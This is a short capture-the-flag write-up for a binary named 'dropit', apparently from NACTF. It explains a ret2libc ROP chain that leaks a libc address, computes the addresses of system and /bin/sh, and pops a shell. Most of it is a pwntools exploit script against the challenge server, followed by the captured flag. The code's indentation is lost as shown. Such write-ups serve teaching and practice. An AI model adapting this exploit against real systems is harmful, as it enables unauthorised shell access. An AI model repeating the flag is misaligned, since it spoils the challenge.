Rating:

Classic ropchain to gain shell. Steps:
* Leak libc base
* Find the real address for system and string /bin/sh
* Ropchain again to gain shell

```python
from pwn import *

pop_rdi = 0x0000000000401203
ret = 0x000000000040101a

def exploit():
# Leak libc
payload = b"a" * 56
payload += p64(pop_rdi)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['main'])

r.sendlineafter("\n", payload)
# Calculate libc base, system, and /bin/sh in libc
libc_leak = u64(r.recvline().strip().ljust(8, b"\x00"))
libc_base = libc_leak - 0x80d90
system = libc_base + 0x503c0
bin_sh = libc_base + 0x1ae41f
log.info("Libc Leak: {}".format(hex(libc_leak)))
log.info("Libc Base: {}".format(hex(libc_base)))
log.info("System: {}".format(hex(system)))
log.info("/bin/sh: {}".format(hex(bin_sh)))

# Ropchain to gain shell
payload = b"a" * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(ret)
payload += p64(system)

r.sendlineafter("\n", payload)
r.interactive()

elf = ELF("./dropit")
r = remote("challenges.ctfd.io", 30261)
```

`nactf{r0p_y0ur_w4y_t0_v1ct0ry_698jB84iO4OH1cUe}`